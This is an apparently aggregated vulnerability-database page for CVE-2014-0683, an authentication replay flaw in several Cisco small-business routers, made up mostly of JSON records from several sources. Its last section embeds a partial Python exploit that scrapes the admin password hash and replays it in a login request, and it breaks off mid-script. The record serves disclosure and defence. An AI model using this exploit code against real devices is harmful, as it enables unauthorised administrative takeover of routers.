CVE-2014-0683 (GCVE-0-2014-0683)

Vulnerability from cvelistv5 – Published: 2014-03-06 11:00 – Updated: 2024-08-06 09:27

Summary

Severity ?

No CVSS data available.

CWE

Assigner

cisco

References

URL

Tags

	http://tools.cisco.com/security/center/content/Ci…	vendor-advisoryx_refsource_CISCO
	https://www.exploit-db.com/exploits/45986/	exploitx_refsource_EXPLOIT-DB

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T09:27:19.104Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "20140305 Cisco Small Business Router Password Disclosure Vulnerability",
            "tags": [
              "vendor-advisory",
              "x_refsource_CISCO",
              "x_transferred"
            ],
            "url": "http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140305-rpd"
          },
          {
            "name": "45986",
            "tags": [
              "exploit",
              "x_refsource_EXPLOIT-DB",
              "x_transferred"
            ],
            "url": "https://www.exploit-db.com/exploits/45986/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2014-03-05T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "The web management interface on the Cisco RV110W firewall with firmware 1.2.0.9 and earlier, RV215W router with firmware 1.1.0.5 and earlier, and CVR100W router with firmware 1.0.1.19 and earlier does not prevent replaying of modified authentication requests, which allows remote attackers to obtain administrative access by leveraging the ability to intercept requests, aka Bug IDs CSCul94527, CSCum86264, and CSCum86275."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-12-15T10:57:01",
        "orgId": "d1c1063e-7a18-46af-9102-31f8928bc633",
        "shortName": "cisco"
      },
      "references": [
        {
          "name": "20140305 Cisco Small Business Router Password Disclosure Vulnerability",
          "tags": [
            "vendor-advisory",
            "x_refsource_CISCO"
          ],
          "url": "http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140305-rpd"
        },
        {
          "name": "45986",
          "tags": [
            "exploit",
            "x_refsource_EXPLOIT-DB"
          ],
          "url": "https://www.exploit-db.com/exploits/45986/"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "psirt@cisco.com",
          "ID": "CVE-2014-0683",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The web management interface on the Cisco RV110W firewall with firmware 1.2.0.9 and earlier, RV215W router with firmware 1.1.0.5 and earlier, and CVR100W router with firmware 1.0.1.19 and earlier does not prevent replaying of modified authentication requests, which allows remote attackers to obtain administrative access by leveraging the ability to intercept requests, aka Bug IDs CSCul94527, CSCum86264, and CSCum86275."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "20140305 Cisco Small Business Router Password Disclosure Vulnerability",
              "refsource": "CISCO",
              "url": "http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140305-rpd"
            },
            {
              "name": "45986",
              "refsource": "EXPLOIT-DB",
              "url": "https://www.exploit-db.com/exploits/45986/"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "d1c1063e-7a18-46af-9102-31f8928bc633",
    "assignerShortName": "cisco",
    "cveId": "CVE-2014-0683",
    "datePublished": "2014-03-06T11:00:00",
    "dateReserved": "2014-01-02T00:00:00",
    "dateUpdated": "2024-08-06T09:27:19.104Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "fkie_nvd": {
      "configurations": "[{\"operator\": \"AND\", \"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:cisco:rv110w_firmware:*:*:*:*:*:*:*:*\", \"versionEndIncluding\": \"1.2.0.9\", \"matchCriteriaId\": \"0B424ACB-5FA3-428A-9156-002A7E34C032\"}]}, {\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:h:cisco:rv110w:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"20E8ECAC-E842-41DB-9612-9374A9648DC2\"}]}]}, {\"operator\": \"AND\", \"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:cisco:rv215w_firmware:*:*:*:*:*:*:*:*\", \"versionEndIncluding\": \"1.1.0.5\", \"matchCriteriaId\": \"AFC1A3C0-E9DB-4BDF-8863-0765505A602A\"}]}, {\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:h:cisco:rv215w:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"8686AB22-F757-468A-930B-DDE45B508969\"}]}]}, {\"operator\": \"AND\", \"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:cisco:cvr100w_firmware:*:*:*:*:*:*:*:*\", \"versionEndIncluding\": \"1.0.1.19\", \"matchCriteriaId\": \"0815850B-0CB3-48AC-BAB4-AFBA041B028C\"}]}, {\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:h:cisco:cvr100w:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"7130355E-D581-4FC4-86FB-11480B81F41B\"}]}]}]",
      "descriptions": "[{\"lang\": \"en\", \"value\": \"The web management interface on the Cisco RV110W firewall with firmware 1.2.0.9 and earlier, RV215W router with firmware 1.1.0.5 and earlier, and CVR100W router with firmware 1.0.1.19 and earlier does not prevent replaying of modified authentication requests, which allows remote attackers to obtain administrative access by leveraging the ability to intercept requests, aka Bug IDs CSCul94527, CSCum86264, and CSCum86275.\"}, {\"lang\": \"es\", \"value\": \"La interfaz de gesti\\u00f3n web en el firewall de Cisco RV110W con firmware 1.2.0.9 y anteriores, router RV215W con firmware 1.1.0.5 y anteriores y router CVR100W con firmware 1.0.1.19 y anteriores no previene la reproducci\\u00f3n de solicitudes de autenticaci\\u00f3n modificadas, lo que permite a atacantes remotos obtener acceso administrativo mediante el aprovechamiento de la habilidad de interceptar solicitudes, tambi\\u00e9n conocido como Bug IDs CSCul94527, CSCum86264 y CSCum86275.\"}]",
      "id": "CVE-2014-0683",
      "lastModified": "2024-11-21T02:02:39.287",
      "metrics": "{\"cvssMetricV2\": [{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"2.0\", \"vectorString\": \"AV:N/AC:L/Au:N/C:C/I:C/A:C\", \"baseScore\": 10.0, \"accessVector\": \"NETWORK\", \"accessComplexity\": \"LOW\", \"authentication\": \"NONE\", \"confidentialityImpact\": \"COMPLETE\", \"integrityImpact\": \"COMPLETE\", \"availabilityImpact\": \"COMPLETE\"}, \"baseSeverity\": \"HIGH\", \"exploitabilityScore\": 10.0, \"impactScore\": 10.0, \"acInsufInfo\": false, \"obtainAllPrivilege\": false, \"obtainUserPrivilege\": false, \"obtainOtherPrivilege\": false, \"userInteractionRequired\": false}]}",
      "published": "2014-03-06T11:55:05.287",
      "references": "[{\"url\": \"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140305-rpd\", \"source\": \"ykramarz@cisco.com\", \"tags\": [\"Patch\", \"Vendor Advisory\"]}, {\"url\": \"https://www.exploit-db.com/exploits/45986/\", \"source\": \"ykramarz@cisco.com\"}, {\"url\": \"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140305-rpd\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Patch\", \"Vendor Advisory\"]}, {\"url\": \"https://www.exploit-db.com/exploits/45986/\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}]",
      "sourceIdentifier": "ykramarz@cisco.com",
      "vulnStatus": "Modified",
      "weaknesses": "[{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-255\"}]}]"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2014-0683\",\"sourceIdentifier\":\"psirt@cisco.com\",\"published\":\"2014-03-06T11:55:05.287\",\"lastModified\":\"2025-04-12T10:46:40.837\",\"vulnStatus\":\"Deferred\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"The web management interface on the Cisco RV110W firewall with firmware 1.2.0.9 and earlier, RV215W router with firmware 1.1.0.5 and earlier, and CVR100W router with firmware 1.0.1.19 and earlier does not prevent replaying of modified authentication requests, which allows remote attackers to obtain administrative access by leveraging the ability to intercept requests, aka Bug IDs CSCul94527, CSCum86264, and CSCum86275.\"},{\"lang\":\"es\",\"value\":\"La interfaz de gesti\u00f3n web en el firewall de Cisco RV110W con firmware 1.2.0.9 y anteriores, router RV215W con firmware 1.1.0.5 y anteriores y router CVR100W con firmware 1.0.1.19 y anteriores no previene la reproducci\u00f3n de solicitudes de autenticaci\u00f3n modificadas, lo que permite a atacantes remotos obtener acceso administrativo mediante el aprovechamiento de la habilidad de interceptar solicitudes, tambi\u00e9n conocido como Bug IDs CSCul94527, CSCum86264 y CSCum86275.\"}],\"metrics\":{\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:L/Au:N/C:C/I:C/A:C\",\"baseScore\":10.0,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"LOW\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"COMPLETE\",\"integrityImpact\":\"COMPLETE\",\"availabilityImpact\":\"COMPLETE\"},\"baseSeverity\":\"HIGH\",\"exploitabilityScore\":10.0,\"impactScore\":10.0,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-255\"}]}],\"configurations\":[{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:cisco:rv110w_firmware:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"1.2.0.9\",\"matchCriteriaId\":\"0B424ACB-5FA3-428A-9156-002A7E34C032\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:h:cisco:rv110w:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"20E8ECAC-E842-41DB-9612-9374A9648DC2\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:cisco:rv215w_firmware:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"1.1.0.5\",\"matchCriteriaId\":\"AFC1A3C0-E9DB-4BDF-8863-0765505A602A\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:h:cisco:rv215w:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"8686AB22-F757-468A-930B-DDE45B508969\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:cisco:cvr100w_firmware:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"1.0.1.19\",\"matchCriteriaId\":\"0815850B-0CB3-48AC-BAB4-AFBA041B028C\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:h:cisco:cvr100w:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"7130355E-D581-4FC4-86FB-11480B81F41B\"}]}]}],\"references\":[{\"url\":\"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140305-rpd\",\"source\":\"psirt@cisco.com\",\"tags\":[\"Patch\",\"Vendor Advisory\"]},{\"url\":\"https://www.exploit-db.com/exploits/45986/\",\"source\":\"psirt@cisco.com\"},{\"url\":\"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140305-rpd\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\",\"Vendor Advisory\"]},{\"url\":\"https://www.exploit-db.com/exploits/45986/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"}]}}"
  }
}

FKIE_CVE-2014-0683

Vulnerability from fkie_nvd - Published: 2014-03-06 11:55 - Updated: 2025-04-12 10:46

Severity ?

Summary

References

URL	Tags
psirt@cisco.com	http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140305-rpd	Patch, Vendor Advisory
psirt@cisco.com	https://www.exploit-db.com/exploits/45986/
af854a3a-2127-422b-91ae-364da2661108	http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140305-rpd	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://www.exploit-db.com/exploits/45986/

Impacted products

Vendor	Product	Version
cisco	rv110w_firmware	*
cisco	rv110w	-
cisco	rv215w_firmware	*
cisco	rv215w	-
cisco	cvr100w_firmware	*
cisco	cvr100w	-

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:cisco:rv110w_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "0B424ACB-5FA3-428A-9156-002A7E34C032",
              "versionEndIncluding": "1.2.0.9",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:cisco:rv110w:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "20E8ECAC-E842-41DB-9612-9374A9648DC2",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:cisco:rv215w_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "AFC1A3C0-E9DB-4BDF-8863-0765505A602A",
              "versionEndIncluding": "1.1.0.5",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:cisco:rv215w:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "8686AB22-F757-468A-930B-DDE45B508969",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:cisco:cvr100w_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "0815850B-0CB3-48AC-BAB4-AFBA041B028C",
              "versionEndIncluding": "1.0.1.19",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:cisco:cvr100w:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "7130355E-D581-4FC4-86FB-11480B81F41B",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "The web management interface on the Cisco RV110W firewall with firmware 1.2.0.9 and earlier, RV215W router with firmware 1.1.0.5 and earlier, and CVR100W router with firmware 1.0.1.19 and earlier does not prevent replaying of modified authentication requests, which allows remote attackers to obtain administrative access by leveraging the ability to intercept requests, aka Bug IDs CSCul94527, CSCum86264, and CSCum86275."
    },
    {
      "lang": "es",
      "value": "La interfaz de gesti\u00f3n web en el firewall de Cisco RV110W con firmware 1.2.0.9 y anteriores, router RV215W con firmware 1.1.0.5 y anteriores y router CVR100W con firmware 1.0.1.19 y anteriores no previene la reproducci\u00f3n de solicitudes de autenticaci\u00f3n modificadas, lo que permite a atacantes remotos obtener acceso administrativo mediante el aprovechamiento de la habilidad de interceptar solicitudes, tambi\u00e9n conocido como Bug IDs CSCul94527, CSCum86264 y CSCum86275."
    }
  ],
  "id": "CVE-2014-0683",
  "lastModified": "2025-04-12T10:46:40.837",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 10.0,
          "confidentialityImpact": "COMPLETE",
          "integrityImpact": "COMPLETE",
          "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 10.0,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2014-03-06T11:55:05.287",
  "references": [
    {
      "source": "psirt@cisco.com",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140305-rpd"
    },
    {
      "source": "psirt@cisco.com",
      "url": "https://www.exploit-db.com/exploits/45986/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140305-rpd"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://www.exploit-db.com/exploits/45986/"
    }
  ],
  "sourceIdentifier": "psirt@cisco.com",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-255"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

GSD-2014-0683

Vulnerability from gsd - Updated: 2023-12-13 01:22

Details

Aliases

CVE-2014-0683

Aliases

CVE-2014-0683

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2014-0683",
    "description": "The web management interface on the Cisco RV110W firewall with firmware 1.2.0.9 and earlier, RV215W router with firmware 1.1.0.5 and earlier, and CVR100W router with firmware 1.0.1.19 and earlier does not prevent replaying of modified authentication requests, which allows remote attackers to obtain administrative access by leveraging the ability to intercept requests, aka Bug IDs CSCul94527, CSCum86264, and CSCum86275.",
    "id": "GSD-2014-0683",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2014-0683"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2014-0683"
      ],
      "details": "The web management interface on the Cisco RV110W firewall with firmware 1.2.0.9 and earlier, RV215W router with firmware 1.1.0.5 and earlier, and CVR100W router with firmware 1.0.1.19 and earlier does not prevent replaying of modified authentication requests, which allows remote attackers to obtain administrative access by leveraging the ability to intercept requests, aka Bug IDs CSCul94527, CSCum86264, and CSCum86275.",
      "id": "GSD-2014-0683",
      "modified": "2023-12-13T01:22:44.155823Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "psirt@cisco.com",
        "ID": "CVE-2014-0683",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "n/a",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "n/a"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "n/a"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "The web management interface on the Cisco RV110W firewall with firmware 1.2.0.9 and earlier, RV215W router with firmware 1.1.0.5 and earlier, and CVR100W router with firmware 1.0.1.19 and earlier does not prevent replaying of modified authentication requests, which allows remote attackers to obtain administrative access by leveraging the ability to intercept requests, aka Bug IDs CSCul94527, CSCum86264, and CSCum86275."
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "n/a"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "20140305 Cisco Small Business Router Password Disclosure Vulnerability",
            "refsource": "CISCO",
            "url": "http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140305-rpd"
          },
          {
            "name": "45986",
            "refsource": "EXPLOIT-DB",
            "url": "https://www.exploit-db.com/exploits/45986/"
          }
        ]
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:rv110w_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.2.0.9",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:rv110w:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:rv215w_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.1.0.5",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:rv215w:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:cvr100w_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.0.1.19",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:cvr100w:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "psirt@cisco.com",
          "ID": "CVE-2014-0683"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "The web management interface on the Cisco RV110W firewall with firmware 1.2.0.9 and earlier, RV215W router with firmware 1.1.0.5 and earlier, and CVR100W router with firmware 1.0.1.19 and earlier does not prevent replaying of modified authentication requests, which allows remote attackers to obtain administrative access by leveraging the ability to intercept requests, aka Bug IDs CSCul94527, CSCum86264, and CSCum86275."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-255"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "20140305 Cisco Small Business Router Password Disclosure Vulnerability",
              "refsource": "CISCO",
              "tags": [
                "Patch",
                "Vendor Advisory"
              ],
              "url": "http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140305-rpd"
            },
            {
              "name": "45986",
              "refsource": "EXPLOIT-DB",
              "tags": [],
              "url": "https://www.exploit-db.com/exploits/45986/"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "cvssV2": {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "integrityImpact": "COMPLETE",
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          "exploitabilityScore": 10.0,
          "impactScore": 10.0,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "HIGH",
          "userInteractionRequired": false
        }
      },
      "lastModifiedDate": "2018-12-15T11:29Z",
      "publishedDate": "2014-03-06T11:55Z"
    }
  }
}

GHSA-7XQW-8R6G-8V75

Vulnerability from github – Published: 2022-05-14 01:48 – Updated: 2025-04-12 12:31

Details

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2014-0683"
  ],
  "database_specific": {
    "cwe_ids": [],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2014-03-06T11:55:00Z",
    "severity": "HIGH"
  },
  "details": "The web management interface on the Cisco RV110W firewall with firmware 1.2.0.9 and earlier, RV215W router with firmware 1.1.0.5 and earlier, and CVR100W router with firmware 1.0.1.19 and earlier does not prevent replaying of modified authentication requests, which allows remote attackers to obtain administrative access by leveraging the ability to intercept requests, aka Bug IDs CSCul94527, CSCum86264, and CSCum86275.",
  "id": "GHSA-7xqw-8r6g-8v75",
  "modified": "2025-04-12T12:31:09Z",
  "published": "2022-05-14T01:48:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-0683"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/45986"
    },
    {
      "type": "WEB",
      "url": "http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140305-rpd"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

VAR-201403-0204

Vulnerability from variot - Updated: 2023-12-18 12:21

The web management interface on the Cisco RV110W firewall with firmware 1.2.0.9 and earlier, RV215W router with firmware 1.1.0.5 and earlier, and CVR100W router with firmware 1.0.1.19 and earlier does not prevent replaying of modified authentication requests, which allows remote attackers to obtain administrative access by leveraging the ability to intercept requests, aka Bug IDs CSCul94527, CSCum86264, and CSCum86275. Vendors have confirmed this vulnerability Bug ID CSCul94527 , CSCum86264 ,and CSCum86275 It is released as.Administrative access may be obtained by using a function to intercept requests by a third party. Cisco RV Series Routers are router devices developed by Cisco. The vulnerability is due to the failure to properly process the authentication request. The attacker can manipulate the special POST data, bypass the login page of the management interface, and gain administrator access and obtain the management password. An attacker can exploit this issue to perform man-in-the-middle attacks and disclose sensitive information. Successful exploits may lead to other attacks. This issue is being tracked by Cisco bug IDs CSCul94527, CSCum86264, and CSCum86275. A remote attacker could exploit this vulnerability to gain administrative-level privileges. The following versions are affected: Cisco RV110W routers with firmware 1.2.0.9 and earlier, RV215W routers with firmware 1.1.0.5 and earlier, and CVR100W routers with firmware 1.0.1.19 and earlier. #!/usr/bin/env python2

Cisco RV110W Password Disclosure and OS Command Execute.

Tested on version: 1.1.0.9 (maybe useable on 1.2.0.9 and later.)

Exploit Title: Cisco RV110W Password Disclosure and OS Command Execute

Date: 2018-08

Exploit Author: RySh

Vendor Homepage: https://www.cisco.com/

Version: 1.1.0.9

Tested on: RV110W 1.1.0.9

CVE : CVE-2014-0683, CVE-2015-6396

import os import sys import re import urllib import urllib2 import getopt import json

import ssl

ssl._create_default_https_context = ssl._create_unverified_context

Usage: ./{script_name} 192.168.1.1 443 "reboot"

if name == "main": IP = argv[1] PORT = argv[2] CMD = argv[3]

# Get session key, Just access index page. 
url = 'https://' + IP + ':' + PORT + '/'
req = urllib2.Request(url)
result = urllib2.urlopen(req)
res = result.read()

# parse 'admin_pwd'! -- Get credits
admin_user = re.search(r'.*(.*admin_name=\")(.*)\"', res).group().split("\"")[1]
admin_pwd = re.search(r'.*(.*admin_pwd=\")(.{32})', res).group()[-32:]
print "Get Cred. Username = " + admin_user + ", PassHash = " + admin_pwd

# Get session_id by POST
req2 = urllib2.Request(url + "login.cgi")
req2.add_header('Origin', url)
req2.add_header('Upgrade-Insecure-Requests', 1)
req2.add_header('Content-Type', 'application/x-www-form-urlencoded')
req2.add_header('User-Agent',
                'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')
req2.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')
req2.add_header('Referer', url)
req2.add_header('Accept-Encoding', 'gzip, deflate')
req2.add_header('Accept-Language', 'en-US,en;q=0.9')
req2.add_header('Cookie', 'SessionID=')
data = {"submit_button": "login",
        "submit_type": "",
        "gui_action": "",
        "wait_time": "0",
        "change_action": "",
        "enc": "1",
        "user": admin_user,
        "pwd": admin_pwd,
        "sel_lang": "EN"
        }
